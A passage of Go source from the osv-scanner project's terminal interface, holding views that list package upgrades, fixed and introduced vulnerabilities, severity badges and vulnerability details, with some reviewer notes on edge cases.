"charm.land/bubbles/v2/table" tea "charm.land/bubbletea/v2" "charm.land/lipgloss/v2" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/resolution" ) // A ViewModel showing the table of package upgrades and fixed vulnerabilities, for in-place upgrades. 
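// Pressing 'enter' on a row shows the vulnerability details
type inPlaceInfo struct {
	table.Model

	// vulns is kept parallel to the table rows: vulns[i] is the
	// vulnerability shown on row i.
	vulns        []*resolution.Vulnerability
	currVulnInfo ViewModel // detail view for the selected row, nil while the table is shown

	width  int
	height int
}

// NewInPlaceInfo builds the table view for an in-place remediation result.
// Every resolved vulnerability of every patch gets its own row; the package
// name and version change are printed only on the first row of a patch.
//
//revive:disable-next-line:unexported-return
func NewInPlaceInfo(res remediation.InPlaceResult) *inPlaceInfo {
	info := inPlaceInfo{width: ViewMinWidth, height: ViewMinHeight} // placeholder dimensions

	cols := []table.Column{
		{Title: "PACKAGE"},
		{Title: "VERSION CHANGE"},
		{Title: "FIXED VULN"},
	}
	for i := range cols {
		cols[i].Width = lipgloss.Width(cols[i].Title)
	}

	rows := make([]table.Row, 0, len(res.Patches))
	for _, patch := range res.Patches {
		// A patch without resolved vulnerabilities has nothing to list, and
		// indexing ResolvedVulns[0] below would panic on it.
		// NOTE(review): presumably every patch resolves at least one
		// vulnerability; confirm against the code that builds InPlaceResult.
		if len(patch.ResolvedVulns) == 0 {
			continue
		}

		// Make a new row for each vulnerability
		// I wanted to have this as one entry with multiple vulnerabilities,
		// but tables don't let you have multi-line rows.

		// Put the package name only on the first row
		row := table.Row{
			patch.Pkg.Name,
			fmt.Sprintf("%s → %s", patch.OrigVersion, patch.NewVersion),
			patch.ResolvedVulns[0].OSV.GetId(),
		}
		// Set each column to their widest element
		for i, s := range row {
			if w := lipgloss.Width(s); w > cols[i].Width {
				cols[i].Width = w
			}
		}
		rows = append(rows, row)
		info.vulns = append(info.vulns, &patch.ResolvedVulns[0])

		// use blank package name / bump for other vulns from same patch
		for i, v := range patch.ResolvedVulns[1:] {
			row := table.Row{
				"",
				"",
				v.OSV.GetId(),
			}
			rows = append(rows, row)
			// i counts from the second vulnerability, hence the +1
			info.vulns = append(info.vulns, &patch.ResolvedVulns[i+1])
			if w := lipgloss.Width(row[2]); w > cols[2].Width {
				cols[2].Width = w
			}
		}
	}

	// centre the version change strings
	cols[1].Title = lipgloss.PlaceHorizontal(cols[1].Width, lipgloss.Center, cols[1].Title)
	for _, row := range rows {
		row[1] = lipgloss.PlaceHorizontal(cols[1].Width, lipgloss.Center, row[1])
	}

	st := table.DefaultStyles()
	st.Header = st.Header.Bold(false).BorderStyle(lipgloss.NormalBorder()).BorderBottom(true)
	st.Selected = st.Selected.Foreground(ColorPrimary)

	info.Model = table.New(
		table.WithColumns(cols),
		table.WithRows(rows),
		table.WithWidth(info.width),
		table.WithHeight(info.height),
		table.WithFocused(true),
		table.WithStyles(st),
		table.WithKeyMap(table.KeyMap{
			LineUp:   Keys.Up,
			LineDown: Keys.Down,
			PageUp:   Keys.Left,
			PageDown: Keys.Right,
		}),
	)

	return &info
}

// Resize records the new dimensions, applies them to the table and passes
// them on to the vulnerability detail view when one is open.
func (ip *inPlaceInfo) Resize(w, h int) {
	ip.width = w
	ip.height = h
	ip.SetWidth(w)
	ip.SetHeight(h)
	if ip.currVulnInfo != nil {
		ip.currVulnInfo.Resize(w, h)
	}
}

// Update handles a message for the view. While a vulnerability detail view is
// open every message is forwarded to it. Otherwise the quit key returns
// CloseViewModel, the select key opens the detail view for the row under the
// cursor, and anything else goes to the table.
func (ip *inPlaceInfo) Update(msg tea.Msg) (ViewModel, tea.Cmd) {
	var cmd tea.Cmd
	if ip.currVulnInfo != nil {
		// NOTE(review): nothing in this method resets currVulnInfo to nil;
		// presumably closing the detail view is handled elsewhere - confirm.
		ip.currVulnInfo, cmd = ip.currVulnInfo.Update(msg)
		return ip, cmd
	}
	if msg, ok := msg.(tea.KeyPressMsg); ok {
		switch {
		case key.Matches(msg, Keys.Quit):
			return ip, CloseViewModel
		case key.Matches(msg, Keys.Select):
			// Guard the lookup: when the table has no rows the cursor does
			// not refer to an entry of ip.vulns and indexing would panic.
			idx := ip.Cursor()
			if idx < 0 || idx >= len(ip.vulns) {
				return ip, nil
			}
			ip.currVulnInfo = NewVulnInfo(ip.vulns[idx])
			ip.currVulnInfo.Resize(ip.Width(), ip.Height())

			return ip, nil
		}
	}
	ip.Model, cmd = ip.Model.Update(msg)

	return ip, cmd
}

// View renders the open vulnerability detail view, or the table centred in
// the view area when no detail view is open.
func (ip *inPlaceInfo) View() string {
	if ip.currVulnInfo != nil {
		return ip.currVulnInfo.View()
	}
	// place the table in the centre of the view
	return lipgloss.Place(ip.width, ip.height, lipgloss.Center, lipgloss.Center, ip.Model.View())
}

================================================
FILE: internal/tui/relock-info.go
================================================
package tui

import (
	"fmt"
	"strings"

	"charm.land/bubbles/v2/key"
	tea "charm.land/bubbletea/v2"
	"charm.land/lipgloss/v2"
	"github.com/google/osv-scanner/v2/internal/resolution"
)

// A ViewModel showing the dependency changes, the removed, and added vulnerabilities
// resulting from a proposed relock patch
type relockInfo struct {
	fixedHeight float64 // fraction of the view height given to fixedList
	fixedList   *vulnList
	addedList   *vulnList // nil when the change introduces no vulnerabilities
	addedFocused bool     // whether addedList currently has the focus
}

// NewRelockInfo builds the view for a proposed relock change: a list of the
// vulnerabilities it removes, headed by the dependency upgrades, and, only
// when the change adds vulnerabilities, a second list of those.
//
//revive:disable-next-line:unexported-return
func NewRelockInfo(change resolution.Difference) *relockInfo {
	info := relockInfo{fixedHeight: 1}
	preamble := strings.Builder{}
	preamble.WriteString("The following upgrades:\n")
	for _, dep := range change.Deps {
		fmt.Fprintf(&preamble, " %s@%s (%s) → @%s (%s)\n",
			dep.Pkg.Name, dep.OrigRequire, dep.OrigResolved, dep.NewRequire, dep.NewResolved)
	}
	preamble.WriteString("Will resolve the following:")

	// Point at the elements of the slice itself rather than at copies.
	fixedVulns := make([]*resolution.Vulnerability, len(change.RemovedVulns))
	for i := range change.RemovedVulns {
		fixedVulns[i] = &change.RemovedVulns[i]
	}
	info.fixedList = NewVulnList(fixedVulns, preamble.String())

	if len(change.AddedVulns) == 0 {
		return &info
	}

	// Create a second list showing introduced vulns
	newVulns := make([]*resolution.Vulnerability, len(change.AddedVulns))
	for i := range change.AddedVulns {
		newVulns[i] = &change.AddedVulns[i]
	}
	info.addedList = NewVulnList(newVulns, "But will introduce the following new vulns:")
	info.addedList.Blur()

	// divide two lists by roughly how many lines each would have
	const fixedMinHeight = 0.5
	const fixedMaxHeight = 0.8
	fixed := float64(len(change.Deps) + len(fixedVulns))
	added := float64(len(newVulns))
	// added is at least 1 here (see the early return above), so the
	// denominator is never zero.
	info.fixedHeight = fixed / (fixed + added)
	if info.fixedHeight < fixedMinHeight {
		info.fixedHeight = fixedMinHeight
	}
	if info.fixedHeight > fixedMaxHeight {
		info.fixedHeight = fixedMaxHeight
	}

	return &info
}

// Resize splits the height h between the two lists according to fixedHeight;
// the added list, when present, gets whatever the fixed list leaves over.
func (r *relockInfo) Resize(w, h int) {
	fixedHeight := int(r.fixedHeight * float64(h))
	r.fixedList.Resize(w, fixedHeight)
	if r.addedList != nil {
		r.addedList.Resize(w, h-fixedHeight)
	}
}

// Update moves the focus between the two lists when the cursor is scrolled
// past the top of the added list or the bottom of the fixed list, and
// otherwise passes the message to both lists.
func (r *relockInfo) Update(msg tea.Msg) (ViewModel, tea.Cmd) {
	var cmds []tea.Cmd
	// check if we're trying to scroll past the end of one of the lists
	if msg, ok := msg.(tea.KeyPressMsg); ok && r.addedList != nil {
		// scrolling up out of the added list
		if r.addedFocused && r.addedList.Index() == 0 && key.Matches(msg, Keys.Up) {
			r.addedFocused = false
			r.addedList.Blur()
			r.fixedList.Focus()

			return r, nil
		}
		// scrolling down out of fixed list
		if !r.addedFocused && r.fixedList.Index() == len(r.fixedList.Items())-1 && key.Matches(msg, Keys.Down) {
			r.addedFocused = true
			r.addedList.Focus()
			r.fixedList.Blur()

			return r, nil
		}
	}

	// do normal updates
	l, cmd := r.fixedList.Update(msg)
	r.fixedList = l.(*vulnList)
	cmds = append(cmds, cmd)
	if r.addedList != nil {
		l, cmd := r.addedList.Update(msg)
		r.addedList = l.(*vulnList)
		cmds = append(cmds, cmd)
	}

	return r, tea.Batch(cmds...)
}

// View shows whichever list has a vulnerability detail view open on its own,
// and otherwise the fixed list above the added list.
func (r *relockInfo) View() string {
	if r.addedList == nil || r.fixedList.currVulnInfo != nil {
		return r.fixedList.View()
	}
	if r.addedList.currVulnInfo != nil {
		return r.addedList.View()
	}

	return lipgloss.JoinVertical(lipgloss.Center, r.fixedList.View(), r.addedList.View())
}

================================================
FILE: internal/tui/severity.go
================================================
package tui

import (
	"fmt"
	"image/color"

	"charm.land/lipgloss/v2"
	"github.com/google/osv-scanner/v2/internal/utility/severity"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
)

var (
	// severityColor maps a severity rating to the badge background colour.
	severityColor = map[string]color.Color{
		"UNKNOWN":  lipgloss.Color("243"), // grey
		"NONE":     lipgloss.Color("243"), // grey
		"LOW":      lipgloss.Color("28"),  // green
		"MEDIUM":   lipgloss.Color("208"), // orange
		"HIGH":     lipgloss.Color("160"), // red
		"CRITICAL": lipgloss.Color("88"),  // dark red
	}
	severityStyle = lipgloss.NewStyle().
			Foreground(lipgloss.Color("15")). // white
			Bold(true).
			Align(lipgloss.Center)
)

// RenderSeverity renders a 16-column badge holding the overall score and
// rating of the given severities, or "UNKNOWN" when the rating is "UNKNOWN".
func RenderSeverity(severities []*osvschema.Severity) string {
	text := "UNKNOWN"
	// NOTE(review): the error from CalculateOverallScore is discarded; confirm
	// that the rating it returns on failure is a key of severityColor,
	// otherwise the lookup below yields a nil colour.
	score, rating, _ := severity.CalculateOverallScore(severities)
	if rating != "UNKNOWN" {
		text = fmt.Sprintf("%1.1f %s", score, rating)
	}

	return severityStyle.Width(16).Background(severityColor[rating]).Render(text)
}

// RenderSeverityShort renders a 5-column badge holding only the overall
// score, or "???" when the rating is "UNKNOWN".
func RenderSeverityShort(severities []*osvschema.Severity) string {
	// NOTE(review): the error is discarded here as well; see RenderSeverity.
	score, rating, _ := severity.CalculateOverallScore(severities)
	scoreStr := fmt.Sprintf("%1.1f", score)
	if rating == "UNKNOWN" {
		scoreStr = "???"
	}

	return severityStyle.Width(5).Background(severityColor[rating]).Render(scoreStr)
}

================================================
FILE: internal/tui/styles.go
================================================
package tui

import (
	"charm.land/lipgloss/v2"
	"charm.land/lipgloss/v2/compat"
)

var (
	ColorPrimary  = lipgloss.Color("#e62129") // Red, from the OSV logo :)
	ColorDisabled = compat.AdaptiveColor{     // Grey
		Light: lipgloss.Color("250"),
		Dark:  lipgloss.Color("238"),
	}
)

var (
	SelectedTextStyle = lipgloss.NewStyle().Foreground(ColorPrimary)
	DisabledTextStyle = lipgloss.NewStyle().Foreground(ColorDisabled)
)

// View dimensions
// width / height refers to the internal text area of the view
// i.e. excluding the border and the padding
const (
	ViewMinHeight = 20  // the minimum internal height the view can be
	ViewVPad      = 1   // the vertical padding of the view
	ViewMinWidth  = 60  // the minimum internal width the view can be
	ViewWidthPct  = 0.4 // percentage of terminal internal width the main view should occupy
	ViewHPad      = 2   // the horizontal padding of the view
)

================================================
FILE: internal/tui/tui.go
================================================
// Package tui provides a terminal user interface for guided remediation.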
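package tui

import (
	"fmt"
	"strings"
	"time"

	"charm.land/bubbles/v2/key"
	"charm.land/bubbles/v2/spinner"
	tea "charm.land/bubbletea/v2"
	"charm.land/lipgloss/v2"
)

// KeyMap holds the key bindings shared by the TUI models.
type KeyMap struct {
	Up         key.Binding
	Down       key.Binding
	Left       key.Binding
	Right      key.Binding
	Select     key.Binding
	SwitchView key.Binding
	Help       key.Binding
	Quit       key.Binding
}

// ShortHelp returns the bindings shown in the collapsed help line.
func (k KeyMap) ShortHelp() []key.Binding {
	return []key.Binding{k.Help, k.Quit}
}

// FullHelp returns the bindings shown in the expanded help, one slice per group.
func (k KeyMap) FullHelp() [][]key.Binding {
	return [][]key.Binding{
		{k.Up, k.Down},
		{k.Select, k.SwitchView},
		{k.Help, k.Quit},
	}
}

// Keys is the default key map. Left and Right carry no help text.
var Keys = KeyMap{
	Up: key.NewBinding(
		key.WithKeys("up"),
		key.WithHelp("↑", "move up"),
	),
	Down: key.NewBinding(
		key.WithKeys("down"),
		key.WithHelp("↓", "move down"),
	),
	Left: key.NewBinding(
		key.WithKeys("left"),
	),
	Right: key.NewBinding(
		key.WithKeys("right"),
	),
	Select: key.NewBinding(
		key.WithKeys("enter"),
		key.WithHelp("enter", "select option"),
	),
	SwitchView: key.NewBinding(
		key.WithKeys("tab", "i"),
		key.WithHelp("i/tab", "switch views"),
	),
	Help: key.NewBinding(
		key.WithKeys("h"),
		key.WithHelp("h", "toggle help"),
	),
	Quit: key.NewBinding(
		key.WithKeys("q", "esc"),
		key.WithHelp("q/esc", "exit"),
	),
}

// NewSpinner creates a stylised spinner
func NewSpinner() spinner.Model {
	sp := spinner.New(spinner.WithSpinner(spinner.Line))
	// Spinner.FPS is actually the duration of each frame, not the frames per second
	sp.Spinner.FPS = 200 * time.Millisecond

	return sp
}

// RenderSelectorOption provides an inline selector renderer, for layouts that don't fit neatly into a list/table
//
// The cursor is written in front of the formatted content and is never part
// of the format string, so a '%' inside cursor cannot be read as a verb or
// consume one of args. The caller's args are left untouched: highlighting is
// applied to a copy.
func RenderSelectorOption(
	selected bool, // whether this line is currently highlighted
	cursor string, // the cursor to display before the line, if it's selected
	format string, // format string for the content. Should only use `%v` specifier
	args ...any, // args for the format string. These will be highlighted if the line is selected
) string {
	if !selected {
		// Keep the column alignment of selected lines by padding with blanks.
		return strings.Repeat(" ", lipgloss.Width(cursor)) + fmt.Sprintf(format, args...)
	}

	// args may alias a slice owned by the caller (f(xs...)), so style a copy.
	styled := make([]any, len(args))
	for i, a := range args {
		styled[i] = SelectedTextStyle.Render(fmt.Sprintf("%v", a))
	}

	return SelectedTextStyle.Render(cursor) + fmt.Sprintf(format, styled...)
}

// ViewModel provides a tea-like model for representing the secondary info panel
// which allows for resizing
type ViewModel interface {
	Update(msg tea.Msg) (ViewModel, tea.Cmd)
	View() string
	Resize(w, h int)
}

// ViewModelCloseMsg provides a message to close the ViewModel
type ViewModelCloseMsg struct{}

// CloseViewModel is the command that emits ViewModelCloseMsg.
var CloseViewModel tea.Cmd = func() tea.Msg { return ViewModelCloseMsg{} }

================================================
FILE: internal/tui/vuln-info.go
================================================
package tui

import (
	"fmt"
	"os"
	"strings"

	"charm.land/bubbles/v2/key"
	"charm.land/bubbles/v2/viewport"
	tea "charm.land/bubbletea/v2"
	"charm.land/glamour/v2"
	"charm.land/glamour/v2/ansi"
	"charm.land/glamour/v2/styles"
	"charm.land/lipgloss/v2"
	"github.com/google/osv-scanner/v2/internal/resolution"
	"github.com/muesli/reflow/wordwrap"
)

// ViewModel to display the details of a specific vulnerability
type vulnInfo struct {
	vuln        *resolution.Vulnerability
	chainGraphs []ChainGraph

	width  int
	height int
	cursor int

	numDetailLines int              // number of lines to show for details in the main view
	mdStyle        ansi.StyleConfig // markdown styling for details

	viewport    viewport.Model // used for scrolling onlyDetails & onlyGraphs views
	onlyDetails bool           // if the details screen is open
	onlyGraphs  bool           // if the affected screen is open
}

var (
	vulnInfoHeadingStyle = lipgloss.NewStyle().
				Bold(true).
				Width(10).
				MarginRight(2).
				Foreground(ColorPrimary)
	highlightedVulnInfoHeadingStyle = vulnInfoHeadingStyle.Reverse(true)
)

// NewVulnInfo builds the detail panel for one vulnerability at the minimum
// view size, with the viewport bound to the shared Keys and the chain graphs
// computed from vuln.Subgraphs.
//
//revive:disable-next-line:unexported-return
func NewVulnInfo(vuln *resolution.Vulnerability) *vulnInfo {
	v := vulnInfo{
		vuln:           vuln,
		width:          ViewMinWidth,
		height:         ViewMinHeight,
		cursor:         0,
		numDetailLines: 5,
		viewport:       viewport.New(viewport.WithWidth(ViewMinWidth), viewport.WithHeight(20)),
	}
	v.viewport.KeyMap = viewport.KeyMap{
		Up:       Keys.Up,
		Down:     Keys.Down,
		PageUp:   Keys.Left,
		PageDown: Keys.Right,
	}

	// remove the padding/margins from the default markdown style
	if lipgloss.HasDarkBackground(os.Stdin, os.Stdout) {
		v.mdStyle = styles.DarkStyleConfig
	} else {
		v.mdStyle = styles.LightStyleConfig
	}
	// NOTE(review): Margin is dereferenced, so this write goes through a
	// pointer that the copied config still shares with the package-level
	// style it came from; it also assumes that pointer is non-nil.
	*v.mdStyle.Document.Margin = 0
	v.mdStyle.Document.BlockPrefix = ""

	v.chainGraphs = FindChainGraphs(vuln.Subgraphs)

	return &v
}

// Resize stores the new size, resizes the viewport and, while the details
// screen is open, re-renders its content for the new width.
func (v *vulnInfo) Resize(w, h int) {
	v.width = w
	v.height = h
	v.viewport.SetWidth(w)
	v.viewport.SetHeight(h)
	if v.onlyDetails {
		v.viewport.SetContent(v.detailsOnlyView())
	}
}

// Update handles input for the detail panel.
//
// While a full-screen sub-view (details or graphs) is open, Quit closes that
// sub-view and every other message goes to the viewport. Otherwise Quit
// returns a nil ViewModel, Up/Down move the cursor over rows 0-4, and Select
// opens the details screen on row 3 or the graphs screen on row 4.
func (v *vulnInfo) Update(msg tea.Msg) (ViewModel, tea.Cmd) {
	if v.onlyDetails || v.onlyGraphs {
		if msg, ok := msg.(tea.KeyPressMsg); ok {
			if key.Matches(msg, Keys.Quit) {
				v.onlyDetails = false
				v.onlyGraphs = false

				return v, nil
			}
		}
		var cmd tea.Cmd
		v.viewport, cmd = v.viewport.Update(msg)

		return v, cmd
	}

	if msg, ok := msg.(tea.KeyPressMsg); ok {
		switch {
		case key.Matches(msg, Keys.Quit):
			return nil, nil
		case key.Matches(msg, Keys.Down):
			if v.cursor < 4 {
				v.cursor++
			}
		case key.Matches(msg, Keys.Up):
			if v.cursor > 0 {
				v.cursor--
			}
		case key.Matches(msg, Keys.Select):
			if v.cursor == 3 {
				v.onlyDetails = true
				v.viewport.SetContent(v.detailsOnlyView())
				v.viewport.GotoTop()
			}
			if v.cursor == 4 {
				v.onlyGraphs = true
				v.viewport.SetContent(v.graphOnlyView())
				v.viewport.GotoTop()
			}
		}
	}

	return v, nil
}

// View renders the summary panel (ID, severity, summary, truncated details,
// first affected path), or the viewport when a full-screen sub-view is open.
//
// NOTE(review): the summary and details are advisory-supplied text that ends
// up on the terminal; no control-character filtering is visible in this
// function - confirm it happens upstream or inside the renderers.
func (v *vulnInfo) View() string {
	if v.onlyDetails || v.onlyGraphs {
		return v.viewport.View()
	}

	// Width left for the value column once the heading column is taken out.
	detailWidth := v.width - (vulnInfoHeadingStyle.GetWidth() + vulnInfoHeadingStyle.GetMarginRight())

	vID := v.vuln.OSV.GetId()
	sev := RenderSeverity(v.vuln.OSV.GetSeverity())
	sum := wordwrap.String(v.vuln.OSV.GetSummary(), detailWidth)

	var det string
	r, err := glamour.NewTermRenderer(
		glamour.WithStyles(v.mdStyle),
		glamour.WithWordWrap(detailWidth),
	)
	if err == nil {
		det, err = r.Render(v.vuln.OSV.GetDetails())
	}
	if err != nil {
		// Either building the renderer or rendering failed.
		det = v.fallbackDetails(detailWidth)
	}
	det = lipgloss.NewStyle().MaxHeight(v.numDetailLines).Render(det)

	s := strings.Builder{}
	s.WriteString(lipgloss.JoinHorizontal(lipgloss.Top,
		v.headingStyle(0).Render("ID:"), vID))
	s.WriteString("\n")
	s.WriteString(lipgloss.JoinHorizontal(lipgloss.Top,
		v.headingStyle(1).Render("Severity:"), sev))
	s.WriteString("\n")
	s.WriteString(lipgloss.JoinHorizontal(lipgloss.Top,
		v.headingStyle(2).Render("Summary:"), sum))
	s.WriteString("\n")
	s.WriteString(lipgloss.JoinHorizontal(lipgloss.Top,
		v.headingStyle(3).Render("Details:"), det))
	s.WriteString("\n")
	s.WriteString(v.headingStyle(4).Render("Affected:"))
	s.WriteString("\n")
	if len(v.chainGraphs) == 0 {
		s.WriteString("ERROR: could not resolve any affected paths\n")
		return s.String()
	}
	s.WriteString(lipgloss.NewStyle().MaxWidth(v.width).Render(v.chainGraphs[0].String()))
	s.WriteString("\n")
	if len(v.chainGraphs) > 1 {
		s.WriteString(DisabledTextStyle.Render(fmt.Sprintf("+%d other paths", len(v.chainGraphs)-1)))
		s.WriteString("\n")
	}

	return s.String()
}

// detailsOnlyView renders the full details text at the panel width, falling
// back to word-wrapped raw text when markdown rendering fails.
func (v *vulnInfo) detailsOnlyView() string {
	s := strings.Builder{}
	s.WriteString(vulnInfoHeadingStyle.Render("Details:"))
	s.WriteString("\n")
	var det string
	r, err := glamour.NewTermRenderer(
		glamour.WithStyles(v.mdStyle),
		glamour.WithWordWrap(v.width),
	)
	if err == nil {
		det, err = r.Render(v.vuln.OSV.GetDetails())
	}
	if err != nil {
		det = v.fallbackDetails(v.width)
	}
	s.WriteString(det)

	return s.String()
}

// graphOnlyView renders every chain graph, each preceded by a newline entry,
// joined vertically and centred.
func (v *vulnInfo) graphOnlyView() string {
	// TODO: some graphs still get clipped on the right side
	// need horizontal scrolling, but that's not supported by the bubbles viewport
	// and it's difficult to implement
	s := strings.Builder{}
	s.WriteString(vulnInfoHeadingStyle.Render("Affected:"))
	strs := make([]string, 0, 2*len(v.chainGraphs)) // 2x to include padding newlines between graphs
	for _, g := range v.chainGraphs {
		strs = append(strs, "\n", g.String())
	}
	s.WriteString(lipgloss.JoinVertical(lipgloss.Center, strs...))

	return s.String()
}

// headingStyle returns the highlighted heading style for the row under the
// cursor and the plain heading style for every other row.
func (v *vulnInfo) headingStyle(idx int) lipgloss.Style {
	if idx == v.cursor {
		return highlightedVulnInfoHeadingStyle
	}

	return vulnInfoHeadingStyle
}

// fallbackDetails returns the raw details text, word-wrapped to width.
func (v *vulnInfo) fallbackDetails(width int) string {
	// Use raw details if markdown rendering fails for whatever reason
	return wordwrap.String(v.vuln.OSV.GetDetails(), width)
}

================================================
FILE: internal/tui/vuln-list.go
================================================
package tui

import (
	"cmp"
	"fmt"
	"io"
	"slices"

	"charm.land/bubbles/v2/key"
	"charm.land/bubbles/v2/list"
	tea "charm.land/bubbletea/v2"
	"charm.land/lipgloss/v2"
	"github.com/google/osv-scanner/v2/internal/resolution"
	"github.com/google/osv-scanner/v2/internal/utility/severity"
	"github.com/muesli/reflow/truncate"
)

// A ViewModel list of vulnerabilities,
// selectable to show details
type vulnList struct {
	// There is a table model that could be used for this instead,
	// but there is much less control over the styling of the cells
	list.Model

	preamble     string    // text to write above vuln list
	currVulnInfo ViewModel // selected vulnerability

	delegate list.ItemDelegate // default item renderer
	blurred  bool              // whether the cursor should be hidden and input disabled
}

// NewVulnList builds the list model from vulns, sorted by descending severity
// and then by ID, with preamble shown above it. The input slice is cloned
// before sorting, so the caller's order is not changed.
//
//revive:disable-next-line:unexported-return
func NewVulnList(vulns []*resolution.Vulnerability, preamble string) *vulnList {
	vl := vulnList{preamble: preamble}
	// Sort the vulns by descending severity, then ID
	vulns = slices.Clone(vulns)
	slices.SortFunc(vulns, func(a, b *resolution.Vulnerability) int {
		aScoreFloat, aRating, _ := severity.CalculateOverallScore(a.OSV.GetSeverity())
		aScore := int(aScoreFloat * 10) // CVSS scores are only to 1dp
		if aRating == "UNKNOWN" {
			aScore = 999 // Sort unknown before critical
		}
		bScoreFloat, bRating, _ := severity.CalculateOverallScore(b.OSV.GetSeverity())
		bScore := int(bScoreFloat * 10) // CVSS scores are only to 1dp
		if bRating == "UNKNOWN" {
			bScore = 999 // Sort unknown before critical
		}

		if c := cmp.Compare(aScore, bScore); c != 0 {
			return -c
		}

		return cmp.Compare(a.OSV.GetId(), b.OSV.GetId())
	})
	items := make([]list.Item, 0, len(vulns))
	delegate := vulnListItemDelegate{idWidth: 0}
	for _, v := range vulns {
		items = append(items, vulnListItem{v})
		// The ID column is as wide as the longest ID in the list.
		if w := lipgloss.Width(v.OSV.GetId()); w > delegate.idWidth {
			delegate.idWidth = w
		}
	}
	l := list.New(items, delegate, ViewMinWidth, ViewMinHeight-vl.preambleHeight())
	l.SetFilteringEnabled(false)
	l.SetShowStatusBar(false)
	l.SetShowHelp(false)
	l.DisableQuitKeybindings()
	l.KeyMap = list.KeyMap{
		CursorUp:   Keys.Up,
		CursorDown: Keys.Down,
		NextPage:   Keys.Right,
		PrevPage:   Keys.Left,
	}

	l.Styles.TitleBar = lipgloss.NewStyle().PaddingLeft(2).Width(ViewMinWidth).BorderStyle(lipgloss.NormalBorder()).BorderBottom(true)
	l.Styles.Title = lipgloss.NewStyle()
	l.Title = fmt.Sprintf("%s %s %s",
		lipgloss.NewStyle().Width(delegate.idWidth).Render("VULN ID"),
		" SEV ", // intentional spacing, scores always 5 wide
		"SUMMARY",
	)

	vl.Model = l
	vl.delegate = delegate

	return &vl
}

// preambleHeight returns the number of lines the preamble takes, 0 if empty.
func (v *vulnList) preambleHeight() int {
	if len(v.preamble) == 0 {
		return 0
	}

	return lipgloss.Height(v.preamble)
}

// Resize resizes the list (leaving room for the preamble), its title bar and
// the open detail panel, if any.
func (v *vulnList) Resize(w, h int) {
	v.SetWidth(w)
	v.SetHeight(h - v.preambleHeight())
	v.Styles.TitleBar = v.Styles.TitleBar.Width(w)
	if v.currVulnInfo != nil {
		v.currVulnInfo.Resize(w, h)
	}
}

// Update handles input for the list.
//
// A blurred list ignores everything. While a detail panel is open, messages go
// to it. Otherwise Quit returns CloseViewModel, Select opens the detail panel
// for the highlighted item, and any other message goes to the embedded list.
func (v *vulnList) Update(msg tea.Msg) (ViewModel, tea.Cmd) {
	if v.blurred {
		return v, nil
	}
	var cmd tea.Cmd
	if v.currVulnInfo != nil {
		v.currVulnInfo, cmd = v.currVulnInfo.Update(msg)
		return v, cmd
	}
	if msg, ok := msg.(tea.KeyPressMsg); ok {
		switch {
		case key.Matches(msg, Keys.Quit):
			return v, CloseViewModel
		case key.Matches(msg, Keys.Select):
			// An unchecked assertion panics when nothing is selected
			// (for instance an empty list), so Select is ignored then.
			selected, isVuln := v.SelectedItem().(vulnListItem)
			if !isVuln {
				return v, nil
			}
			v.currVulnInfo = NewVulnInfo(selected.Vulnerability)
			v.currVulnInfo.Resize(v.Width(), v.Height())

			return v, nil
		}
	}
	if v.currVulnInfo == nil {
		v.Model, cmd = v.Model.Update(msg)
	}

	return v, cmd
}

// View renders the open detail panel if there is one, else the list with the
// preamble (when set) above it.
func (v *vulnList) View() string {
	if v.currVulnInfo != nil {
		return v.currVulnInfo.View()
	}
	str := v.Model.View()
	if len(v.preamble) > 0 {
		str = lipgloss.JoinVertical(lipgloss.Left, v.preamble, str)
	}

	return str
}

// Blur disables input and hides the selection highlight.
func (v *vulnList) Blur() {
	v.blurred = true
	v.SetDelegate(blurredDelegate{v.delegate})
}

// Focus re-enables input and restores the default item renderer.
func (v *vulnList) Focus() {
	v.blurred = false
	v.SetDelegate(v.delegate)
}

// Helpers for the list.Model

// vulnListItem wraps a vulnerability as a list item.
type vulnListItem struct {
	*resolution.Vulnerability
}

// FilterValue returns the vulnerability ID.
func (v vulnListItem) FilterValue() string {
	return v.OSV.GetId()
}

// vulnListItemDelegate renders one vulnerability per row; idWidth is the
// width of the ID column.
type vulnListItemDelegate struct {
	idWidth int
}

// Height returns the number of lines one item takes.
func (d vulnListItemDelegate) Height() int { return 1 }

// Spacing returns the number of blank lines between items.
func (d vulnListItemDelegate) Spacing() int { return 0 }

// Update does nothing: items have no behaviour of their own.
func (d vulnListItemDelegate) Update(tea.Msg, *list.Model) tea.Cmd { return nil }

// Render writes one row: cursor, ID, short severity badge, then the summary
// truncated with "…" to the width that is left. Items that are not a
// vulnListItem are skipped.
//
// NOTE(review): the summary is advisory-supplied text written to the
// terminal; no control-character filtering is visible here - confirm it
// happens upstream.
func (d vulnListItemDelegate) Render(w io.Writer, m list.Model, index int, listItem list.Item) {
	vuln, ok := listItem.(vulnListItem)
	if !ok {
		return
	}
	cursor := " "
	idStyle := lipgloss.NewStyle().Width(d.idWidth).Align(lipgloss.Left)
	if index == m.Index() {
		cursor = SelectedTextStyle.Render(">")
		idStyle = idStyle.Inherit(SelectedTextStyle)
	}
	id := idStyle.Render(vuln.OSV.GetId())
	sev := RenderSeverityShort(vuln.OSV.GetSeverity())
	str := fmt.Sprintf("%s %s %s ", cursor, id, sev)
	fmt.Fprint(w, str)
	// On a list narrower than the fixed columns the difference is negative;
	// converted to uint it would wrap to a huge width and switch truncation
	// off, so it is clamped to zero first.
	room := max(m.Width()-lipgloss.Width(str), 0)
	fmt.Fprint(w, truncate.StringWithTail(vuln.OSV.GetSummary(), uint(room), "…")) //nolint:gosec // room is clamped to >= 0 above
}

// workaround item delegate wrapper to stop the selected item from being shown as selected
type blurredDelegate struct {
	list.ItemDelegate
}

// Render forwards to the wrapped delegate with index -1, so that no row
// compares equal to the list's selected index.
func (d blurredDelegate) Render(w io.Writer, m list.Model, _ int, listItem list.Item) {
	d.ItemDelegate.Render(w, m, -1, listItem)
}

================================================
FILE: internal/url/url.go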
================================================
// Copyright 2019 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

// Package url provides functionality for converting file paths to file URLs.
//
// Code copied from
// https://github.com/golang/go/blob/7c2b69080a0b9e35174cc9c93497b6e7176f8275/src/cmd/go/internal/web/url.go
// TODO(golang.org/issue/32456): If accepted, move these functions into the
// net/url package.
package url

import (
	"errors"
	"net/url"
	"path/filepath"
	"strings"
)

// errNotAbsolute is returned by FromFilePath for a path that is not absolute.
var errNotAbsolute = errors.New("path is not absolute")

// FromFilePath converts an absolute file path into a file:// URL.
//
// A path that filepath.IsAbs rejects yields errNotAbsolute. A path whose
